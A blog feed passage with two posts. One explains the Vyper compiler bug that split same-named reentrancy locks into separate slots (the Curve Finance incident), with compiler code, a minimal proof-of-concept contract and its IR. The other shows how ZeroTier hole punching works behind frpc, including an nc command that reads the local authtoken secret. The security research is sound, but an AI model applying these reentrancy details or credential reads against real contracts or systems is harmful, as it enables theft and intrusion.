class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># From the root of the vyper repository</span></span><br><span class="line"><span class="built_in">cp</span> ./vyper/__main__.py vyper.py</span><br><span class="line">python3 vyper.py --<span class="built_in">help</span></span><br></pre></td></tr></table></figure><h3 id="2-合约下载">2. Getting the Contract Source</h3><p>A contract's source code can be found on a block explorer at its on-chain address, for example <a href="https://bscscan.com/address/0x245a45cdf2271d026976811a80c091fe5b49ac40#code">https://bscscan.com/address/0x245a45cdf2271d026976811a80c091fe5b49ac40#code</a></p><p><img src="/2023/08/curve_finance_vuln/image-20230810175940172.png" alt="image-20230810175940172"></p><p>The contract is open source, so there is more than one way to locate its code; the link above is just one example.</p><h2 id="三、漏洞根因">III. Root Cause</h2><h3 id="1-安全的重入锁状态维护逻辑">1. The Safe Reentrancy-Lock Logic</h3><p>Before digging into the root cause, let's briefly look at <strong>how reentrancy-lock state was maintained before the vulnerable commit</strong>.</p><p>A reentrancy lock naturally needs a slot in storage to hold its state, which is what the <code>get_nonreentrant_lock</code> function takes care of:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Before the vulnerable commit</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_nonreentrant_lock</span>(<span class="params">func_type, global_ctx</span>):</span><br><span class="line">    nonreentrant_pre = [[<span class="string">&quot;pass&quot;</span>]]</span><br><span class="line">    nonreentrant_post = [[<span class="string">&quot;pass&quot;</span>]]</span><br><span class="line">    <span class="keyword">if</span> func_type.nonreentrant:</span><br><span class="line">        nkey = 
global_ctx.get_nonrentrant_counter(func_type.nonreentrant)</span><br><span class="line">        nonreentrant_pre = [[<span class="string">&quot;seq&quot;</span>, [<span class="string">&quot;assert&quot;</span>, [<span class="string">&quot;iszero&quot;</span>, [<span class="string">&quot;sload&quot;</span>, nkey]]], [<span class="string">&quot;sstore&quot;</span>, nkey, <span class="number">1</span>]]]</span><br><span class="line">        nonreentrant_post = [[<span class="string">&quot;sstore&quot;</span>, nkey, <span class="number">0</span>]]</span><br><span class="line">    <span class="keyword">return</span> nonreentrant_pre, nonreentrant_post</span><br></pre></td></tr></table></figure><p>As the code shows, when a function is marked <strong>nonreentrant</strong>, Vyper emits the IR sequence above wherever the contract logic needs the lock. The IR is simple: acquiring the lock <strong>asserts that the lock is 0 and then sets it to 1</strong>; releasing the lock <strong>resets it to 0</strong>.</p><p>The slot that holds the lock state comes from <code>global_ctx.get_nonrentrant_counter</code>, the very function that the vulnerable commit marks as dead code. It decides which slot stores the lock state based on the key passed in:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_nonrentrant_counter</span>(<span class="params">self, key</span>):</span><br><span class="line">    <span 
class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Nonrentrant locks use a prefix with a counter to minimise deployment cost of a contract.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    We&#x27;re able to set the initial re-entrant counter using the sum of the sizes</span></span><br><span class="line"><span class="string">    of all the storage slots because all storage slots are allocated while parsing</span></span><br><span class="line"><span class="string">    the module-scope, and re-entrancy locks aren&#x27;t allocated until later when parsing</span></span><br><span class="line"><span class="string">    individual function scopes. This relies on the deprecated _globals attribute</span></span><br><span class="line"><span class="string">    because the new way of doing things (set_data_positions) doesn&#x27;t expose the</span></span><br><span class="line"><span class="string">    next unallocated storage location.</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> key <span class="keyword">in</span> <span class="variable language_">self</span>._nonrentrant_keys:</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>._nonrentrant_keys[key]</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        counter = (</span><br><span class="line">            <span class="built_in">sum</span>(v.size <span class="keyword">for</span> v <span class="keyword">in</span> <span class="variable language_">self</span>._<span class="built_in">globals</span>.values() <span class="keyword">if</span> <span class="keyword">not</span> <span class="built_in">isinstance</span>(v.typ, MappingType))</span><br><span class="line">            + <span class="variable 
language_">self</span>._nonrentrant_counter</span><br><span class="line">        )</span><br><span class="line">        <span class="variable language_">self</span>._nonrentrant_keys[key] = counter</span><br><span class="line">        <span class="variable language_">self</span>._nonrentrant_counter += <span class="number">1</span></span><br><span class="line">        <span class="keyword">return</span> counter</span><br></pre></td></tr></table></figure><p>For reentrancy locks, the key is the string given in the Vyper source, such as <code>lock</code> in the code below; it distinguishes one lock from another:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@external</span></span><br><span class="line"><span class="meta">@nonreentrant(<span class="params"><span class="string">&#x27;lock&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add_liquidity</span>() -&gt; uint256:</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@external</span></span><br><span class="line"><span class="meta">@nonreentrant(<span class="params"><span class="string">&#x27;lock&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exchange</span>() -&gt; uint256:</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span></span><br></pre></td></tr></table></figure><p>In short, before the vulnerable commit, Vyper used the <strong>lock name string</strong> in the source to <strong>tell reentrancy locks apart</strong>, and it did so by <strong>choosing the storage slot for the lock state
according to that string</strong>. As a result, when <strong>different functions</strong> use a <strong>lock with the same name</strong>, those locks share a single slot, which is what defends against reentrancy across them.</p><h3 id="2-带有漏洞的重入锁状态维护逻辑">2. The Vulnerable Reentrancy-Lock Logic</h3><p>Before the bug was introduced, the slots holding reentrancy-lock state were appended directly after the <strong>storage allocated for global variables</strong>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_nonrentrant_counter</span>(<span class="params">self, key</span>):</span><br><span class="line">    <span class="keyword">if</span> key <span class="keyword">in</span> <span class="variable language_">self</span>._nonrentrant_keys:</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>._nonrentrant_keys[key]</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="comment"># Note how counter is computed here</span></span><br><span class="line">        counter = (</span><br><span class="line">            <span class="built_in">sum</span>(v.size <span class="keyword">for</span> v <span class="keyword">in</span> <span class="variable language_">self</span>._<span class="built_in">globals</span>.values() <span class="keyword">if</span> <span class="keyword">not</span> <span class="built_in">isinstance</span>(v.typ, MappingType))</span><br><span class="line">            + <span class="variable language_">self</span>._nonrentrant_counter</span><br><span class="line">        )</span><br><span class="line">        <span class="variable language_">self</span>._nonrentrant_keys[key] = 
counter</span><br><span class="line">        <span class="variable language_">self</span>._nonrentrant_counter += <span class="number">1</span></span><br><span class="line">        <span class="keyword">return</span> counter</span><br></pre></td></tr></table></figure><p>The vulnerable commit <strong>tries to merge the allocation of reentrancy-lock state with the allocation of the other global variables</strong>: lock slots are now assigned while the Vyper AST is being processed, rather than being generated and assigned on demand later during IR generation. Consequently <code>global_ctx.get_nonrentrant_counter</code>, which used to assign lock slots on demand, is no longer called, and the developers marked it as dead code. The job of assigning lock slots moved to <code>set_storage_slots</code>, which runs during the <strong>AST processing stage</strong> and previously <strong>only assigned storage slots to ordinary variables</strong>.</p><p><img src="/2023/08/curve_finance_vuln/image-20230810181144949.png" alt="image-20230810181144949"></p><p>The diff shows how the vulnerable commit assigns lock slots: it allocates one lock slot per function. So for <strong>same-named locks</strong> on <strong>different functions</strong>, holding one lock does not block entry into the other.</p><h3 id="3-漏洞演示">3. Demonstration</h3><p>Here is a PoC for this Vyper reentrancy-lock bug:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@external</span></span><br><span class="line"><span class="meta">@nonreentrant(<span class="params"><span class="string">&#x27;lock&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add_liquidity</span>() -&gt; uint256:</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@external</span></span><br><span class="line"><span class="meta">@nonreentrant(<span class="params"><span 
class="string">&#x27;lock&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exchange</span>() -&gt; uint256:</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span></span><br></pre></td></tr></table></figure><p>The PoC is simple: it declares <strong>two different functions</strong> that use a <strong>reentrancy lock with the same name</strong>. Let's dump its IR:</p><p>Command to dump the IR: <code>python3 vyper.py -f ir &lt;vyper-script-path&gt;</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">$ python3 vyper.py -f ir vyper_workdir/test.vy</span><br><span class="line">[<span 
class="built_in">seq</span>,</span><br><span class="line">  [<span class="built_in">return</span>,</span><br><span class="line">    0,</span><br><span class="line">    [lll,</span><br><span class="line">      [<span class="built_in">seq</span>,</span><br><span class="line">        [<span class="keyword">if</span>, [lt, calldatasize, 4], [goto, fallback]],</span><br><span class="line">        [mstore, 28, [calldataload, 0]],</span><br><span class="line">        [with,</span><br><span class="line">          _func_sig,</span><br><span class="line">          [mload, 0],</span><br><span class="line">          [<span class="built_in">seq</span>,</span><br><span class="line">            [assert, [iszero, callvalue]],</span><br><span class="line">            <span class="comment"># Line 3</span></span><br><span class="line">            [<span class="keyword">if</span>,</span><br><span class="line">              [eq, _func_sig, 3964006281 &lt;add_liquidity()&gt;],</span><br><span class="line">              [<span class="built_in">seq</span>,</span><br><span class="line">                [assert, [iszero, [sload, 0]]],    <span class="comment"># check the lock state</span></span><br><span class="line">                [sstore, 0 /*slot*/, 1 /*val*/],   <span class="comment"># acquire the lock</span></span><br><span class="line">                pass,</span><br><span class="line">                <span class="comment"># Line 4</span></span><br><span class="line">                [mstore, 0, 0],</span><br><span class="line">                [seq_unchecked, [sstore, 0, 0], [<span class="built_in">return</span>, 0, 32]],</span><br><span class="line">                <span class="comment"># Line 3</span></span><br><span class="line">                [sstore, 0, 0],                    <span class="comment"># release the lock</span></span><br><span class="line">                stop]],</span><br><span class="line">            <span class="comment"># Line 8</span></span><br><span class="line">            [<span 
class="keyword">if</span>,</span><br><span class="line">              [eq, _func_sig, 3539412570 &lt;exchange()&gt;],</span><br><span class="line">              [<span class="built_in">seq</span>,</span><br><span class="line">                [assert, [iszero, [sload, 1]]],    <span class="comment"># check the lock state</span></span><br><span class="line">                [sstore, 1, 1],                    <span class="comment"># acquire the lock</span></span><br><span class="line">                pass,</span><br><span class="line">                <span class="comment"># Line 9</span></span><br><span class="line">                [mstore, 0, 0],</span><br><span class="line">                [seq_unchecked, [sstore, 1, 0], [<span class="built_in">return</span>, 0, 32]],</span><br><span class="line">                <span class="comment"># Line 8</span></span><br><span class="line">                [sstore, 1, 0],                    <span class="comment"># release the lock</span></span><br><span class="line">                stop]]]],</span><br><span class="line">        [seq_unchecked, [label, fallback], /* Default <span class="keyword">function</span> */ [revert, 0, 0]]],</span><br><span class="line">      0]]]</span><br></pre></td></tr></table></figure><p>The two pairs of sstore instructions clearly use different slots: the first function uses slot 0, while the second uses slot 1.</p><h3 id="4-漏洞修复">4. 
漏洞修复</h3><p><a href="https://github.com/vyperlang/vyper/commit/eae0eaf8#diff-bbb2d32046e0a730536ca9e7d0b871e3765826115fc9f0c0228ddf08f171dde6R35">漏洞补丁</a>很简单，只允许在<strong>出现不同名的重入锁时</strong>才使用新的 slot：</p><p><img src="/2023/08/curve_finance_vuln/image-20230810190717895.png" alt="image-20230810190717895"></p><!--## 四、链上合约复现现在要复现一下在真实合约里利用该漏洞进行攻击的操作。首先是找到目标合约的源代码。通过一系列的搜索，最后确定源代码位置为 [CurveCryptoSwap2ETH - github](https://github.com/curvefi/curve-crypto-contract/blob/master/contracts/two/CurveCryptoSwap2ETH.vy)**注意：由于漏洞影响跨度大，因此合约代码的 commit 时间已经要和带有漏洞的 vyper commit 时间相对应，否则会编译失败。**我个人是先把 vyper checkout 到了[漏洞补丁的上一个 commit 处](https://github.com/vyperlang/vyper/commit/3931ba4bf83eed2b9af7635362905c1b6e3a48a7)，这个 commit 的时间是 2021.10.25；然后再把合约代码 checkout 到了 [2021.12.5 的版本](https://github.com/curvefi/curve-crypto-contract/commit/101af9bb511f832ca5b) 上。合约代码稍微有点超前但是还是可以正常编译（**注意要把合约里第一行的版本被删除掉**）：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ python3 ../vyper.py ./curve-crypto-contract/contracts/two/CurveCryptoSwap2ETH.vy</span><br><span class="line">0x60206154b260c03960c0518060a01c6154ad5761014052602060206154b20160c03960c0518060a01c6154ad576101605261014051602055602060406154b20160c03960c05160801b61018052602060606154b20160c03960c05161018051176101805261018051600b5561018051600c55602060806154b20160c03960c051601755602060a06154b20160c03960c051601855602060c06154b20160c03960c0...</span><br></pre></td></tr></table></figure><p>接下来就要去 <a href="https://remix.ethereum.org/">Remix IDE</a> 上编译一下合约。但在进一步之前，在 Remix 需要里先点击插件处，安装 Vyper 插件，然后才能在侧边栏上找到 Vyper 的编译按钮。</p><p><img src="curve_finance_vuln/image-20230811170232884.png" alt="image-20230811170232884"></p><p>有意思的是，这里的 Vyper 版本刚好位于受影响范围内（0.2.15/0.2.16/0.3.0），因此我们本地就可以无需手动编译并上传 EVM 字节码了：</p><p><img src="curve_finance_vuln/image-20230811170403914.png" 
alt="image-20230811170403914"></p><blockquote><p>但事实上如图所示我还是没编译成功， 返回了一个 “Failed to fetch” 错误，也不知道是不是因为网络环境的问题。</p></blockquote>--><h2 id="五、参考">V. References</h2><ul><li><a href="https://medium.com/chainlight/curve-finance-analysis-and-post-mortem-ba55f2b26909">Curve Finance Analysis and Post-mortem - medium</a></li></ul>]]></content>
    
    
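    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;Smart contracts play an important role in the blockchain world. This post documents my reproduction of a compiler bug in Vyper, a Pythonic smart contract language for the EVM: the bug rendered the reentrancy locks in compiled contracts ineffective, leaving those contracts open to &lt;strong&gt;reentrancy attacks&lt;/strong&gt;.&lt;/p&gt;</summary>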
    
    
    
    <category term="Blockchain" scheme="https://kiprey.github.io/categories/Blockchain/"/>
    
    
    <category term="Curve Finance" scheme="https://kiprey.github.io/tags/Curve-Finance/"/>
    
  </entry>
  
  <entry>
    <title>Notes on Building a ZeroTier Moon Behind frpc NAT Traversal</title>
    <link href="https://kiprey.github.io/2023/05/zerotier_moon_frpc/"/>
    <id>https://kiprey.github.io/2023/05/zerotier_moon_frpc/</id>
    <published>2023-05-16T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.218Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>ZeroTier is a tool for networking machines across different sites. It connects geographically separated machines, either peer-to-peer or through a relay, so that they behave as if they shared one LAN.</p><p>Nodes in a ZeroTier network fall into three kinds: Planet, the central servers located outside China; Moon, a user-run node; and Leaf, the user's other nodes.</p><p>Because the Planets are located outside China, both UDP hole punching and relaying become very slow when two machines are far apart. I therefore set up my own ZeroTier Moon inside China to improve the hole-punching success rate and the relay speed.</p><p>The Moon tutorials I found online all require renting a server. I did not want to go that far, so I explored building one behind frpc NAT traversal instead.</p><span id="more"></span><h2 id="二、Zerotier-打洞-中继">II. ZeroTier Hole Punching and Relaying</h2><p>Before setting up NAT traversal or a Moon, we first need to understand how ZeroTier punches holes and relays traffic.</p><blockquote><p>This section is based on <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/OneService.cpp">ZeroTierOne/service/OneService.cpp - github</a>, plus my own painful experience from many hours of debugging and Wireshark captures.</p></blockquote><h3 id="1-监听状态">1. Listening Sockets</h3><p>ZeroTier uses <strong>3 ports</strong> locally, and <strong>listens for both TCP and UDP</strong> on each of them. Here is what ZeroTier listens on on my machine:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">➜  zerotier-one <span class="built_in">sudo</span> lsof -i -P -n | grep zerotier</span><br><span class="line">zerotier- 2091716    zerotier-one    6u  IPv4 868501026      0t0  TCP 127.0.0.1:9993 (LISTEN)</span><br><span class="line">zerotier- 2091716    zerotier-one    7u  IPv6 868501027      0t0  TCP [::1]:9993 (LISTEN)</span><br><span class="line"></span><br><span class="line">zerotier- 2091716    zerotier-one   16u  IPv4 868501047      0t0  UDP 192.168.51.236:9993</span><br><span class="line">zerotier- 2091716    zerotier-one   17u  IPv4 868501048      0t0  TCP 192.168.51.236:9993 
(LISTEN)</span><br><span class="line"></span><br><span class="line">zerotier- 2091716    zerotier-one   14u  IPv4 868501045      0t0  UDP 192.168.51.236:30978</span><br><span class="line">zerotier- 2091716    zerotier-one   15u  IPv4 868501046      0t0  TCP 192.168.51.236:30978 (LISTEN)</span><br><span class="line"></span><br><span class="line">zerotier- 2091716    zerotier-one   18u  IPv4 868501049      0t0  UDP 192.168.51.236:42276</span><br><span class="line">zerotier- 2091716    zerotier-one   19u  IPv4 868501050      0t0  TCP 192.168.51.236:42276 (LISTEN)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ... remaining IPv6 listeners omitted</span></span><br></pre></td></tr></table></figure><h3 id="2-三个端口">2. The Three Ports</h3><p>Ports first. The three ports are the primary, secondary, and tertiary ports, defined as the source comment below describes:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ref: https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/OneService.cpp#L802</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">* To attempt to handle NAT/gateway craziness we use three local UDP ports:</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* [0] is the normal/default port, usually 9993</span></span><br><span class="line"><span class="comment">* [1] is a port derived from our ZeroTier address</span></span><br><span class="line"><span class="comment">* [2] is 
a port computed from the normal/default for use with uPnP/NAT-PMP mappings</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">* [2] exists because on some gateways trying to do regular NAT-t interferes</span></span><br><span class="line"><span class="comment">* destructively with uPnP port mapping behavior in very weird buggy ways.</span></span><br><span class="line"><span class="comment">* It&#x27;s only used if uPnP/NAT-PMP is enabled in this build.</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>The <strong>primary port defaults to 9993</strong> (the default can be changed; see <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/README.md">ZeroTier One Network Virtualization Service Documentation</a>).</p><blockquote><p>Some Moon tutorials online configure port 9995; without reading the source it is easy to lose track of which port actually matters.</p><p>To be clear: by default ZeroTier has nothing to do with port 9995; <strong>only port 9993 is involved</strong>.</p></blockquote><p>When the host tries to connect to a peer, all three ports send <strong>UDP packets</strong> to the peer at the same time.</p><blockquote><p>Throughout this post, "host" means the local machine. P2P is decentralized, but distinguishing the local machine from the remote peer makes the explanation easier.</p></blockquote><p>On receiving the data, the peer immediately replies from the corresponding port with a UDP packet to the source address, punching the hole. If the host receives any one of the three UDP replies, the peer counts as directly reachable (DIRECT), meaning P2P hole punching succeeded. The host and peer then exchange periodic heartbeats to keep the hole open, and data flows over <strong>the port on which the host successfully received the peer's packet</strong>.</p><blockquote><p>In packet captures I often saw the host send three UDP packets to the peer (one from each of the three ports) yet receive only a single UDP packet back from the peer.</p></blockquote><p><code>zerotier-cli peers</code> shows whether the link between the local machine and each peer is DIRECT (P2P) or RELAY; those are the only two link states.</p><blockquote><p>The command requires sudo/administrator privileges.</p></blockquote><p>We can also see that ZeroTier listens for TCP on the three ports. This <strong>TCP traffic has nothing to do with hole punching or peer communication</strong>; it is actually HTTP, used mainly by the local zerotier-cli to talk to the service. For example:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">➜  zerotier-one <span class="built_in">echo</span> <span class="string">&quot;GET /info HTTP/1.1\r\nX-ZT1-Auth: <span class="subst">$(sudo cat /var/lib/zerotier-one/authtoken.secret)</span>\r\n\r\n&quot;</span> | nc 127.0.0.1 9993 -v</span><br><span class="line">Connection to 127.0.0.1 9993 port [tcp/*] succeeded!</span><br><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line">Pragma: no-cache</span><br><span class="line">Content-Type: application/json</span><br><span class="line">Content-Length: 91</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">        <span class="string">&quot;controller&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">        <span class="string">&quot;apiVersion&quot;</span>: 4,</span><br><span class="line">        <span class="string">&quot;clock&quot;</span>: 1684295560845,</span><br><span class="line">        <span class="string">&quot;databaseReady&quot;</span>: <span class="literal">true</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>The only TCP endpoint I managed to query was <code>127.0.0.1:9993</code>; nc failed against every other listening port/address combination, and I have not worked out why.</p></blockquote><p>For the other HTTP request options, see <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3fb00becc578afc0645c60b1de3d84bb4c/service/README.md#network-virtualization-service-api">Network Virtualization Service API</a>; I won't go into them here.</p><h3 id="3-中继">3. 
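Relaying</h3><p>When the host and peer cannot connect directly over P2P, ZeroTier falls back to relaying; the relevant logic lives in <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/OneService.cpp#L3233">the nodeWirePacketSendFunction function</a>.</p><p>There are two kinds of relay, TCP and UDP:</p><ul><li><p><strong>UDP relay.</strong> This is ZeroTier's main relay mechanism: the node finds a Moon/Planet and asks it to relay the outgoing packets over UDP. Both host and peer therefore send and receive relayed data purely as UDP, and the logic is fairly simple.</p></li><li><p><strong>TCP relay.</strong> ZeroTier considers <strong>TCP relaying too expensive</strong>, so it is used only under extreme conditions, for example when UDP relaying fails entirely because a gateway filters every UDP packet or timeouts are severe. Such conditions are very rare, so in practice ZeroTier almost never uses TCP relay.</p><p>ZeroTier falls back to TCP relay only after receiving no data at all for 60 s. That is a long time, and I expect most setups never trigger it.</p></li></ul><p>Following the <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/tcp-proxy/README.md">ZeroTier TCP Proxy Server Documentation</a>, you can configure <code>local.conf</code> to <strong>force TCP relay</strong>. Once forced TCP relay is on, UDP relay is no longer used. Although <strong>ZeroTier considers TCP relay slower than UDP relay</strong>, my ping tests showed that <strong>the TCP relay node was somewhat closer to me than the UDP relay nodes</strong>, with lower latency. So take ZeroTier's claim with a grain of salt and measure in your own network.</p><h2 id="三、Frpc-内网穿透">III. NAT Traversal with frpc</h2><h3 id="1-做法">1. 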
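Approach</h3><p><strong>frpc is used to expose UDP port 9993 of the Moon server.</strong></p><p>I use <a href="https://www.natfrp.com/">NatFrp</a>, which is really generous: the free tier offers 5Gb/10Mbps/2 tunnels per month, enough for most needs.</p><p>Pick a data center close to your peers, and prefer a <strong>multi-line</strong> one (as I understand it, a data center connected to several carriers' networks at once), so that P2P hole punching has a good chance of succeeding whichever carrier the local machine is on. Here is my tunnel configuration:</p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517132531412.png" alt="image-20230517132531412"></p><p>Note that the local IP set here <strong>must be a LAN IP</strong> (192.168.0.0/16 and the like), <strong>not the loopback IP (127.0.0.1)</strong>. The acceptable LAN ranges are shown below:</p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517120903864.png" alt="image-20230517120903864"></p><blockquote><p>The code is in <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3fb00becc578afc0645c60b1de3d84bb4c/node/InetAddress.cpp#L29">the InetAddress::ipScope function</a>.</p></blockquote><p>Seeing that <code>172.16.0.0/12</code> also qualifies, you might be tempted to give the Moon server (the machine being exposed) an extra virtual-network IP starting with <code>172.16</code> in the ZeroTier control panel and then bind frpc to that new address. In my tests this does not work, <strong>because the ZeroTier service does not listen on IPs inside its own virtual networks</strong>.</p><p>The local IP entered here must both <strong>fall within the ranges in the figure above</strong> and be <strong>an address on which ZeroTier listens for UDP</strong>.</p><h3 id="2-原理">2. 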
How It Works</h3><blockquote><p>Feel free to skip this section if you are not interested in the internals.</p></blockquote><p>The requirement above exists because <a href="https://github.com/zerotier/ZeroTierOne/blob/adfbbc3fb00becc578afc0645c60b1de3d84bb4c/node/Path.hpp#L223">the isAddressValidForPath function</a> accepts only <strong>four scopes</strong> of IP address as valid:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">  * Check whether this address is valid for a ZeroTier path</span></span><br><span class="line"><span class="comment">  *</span></span><br><span class="line"><span class="comment">  * This checks the address type and scope against address types and scopes</span></span><br><span 
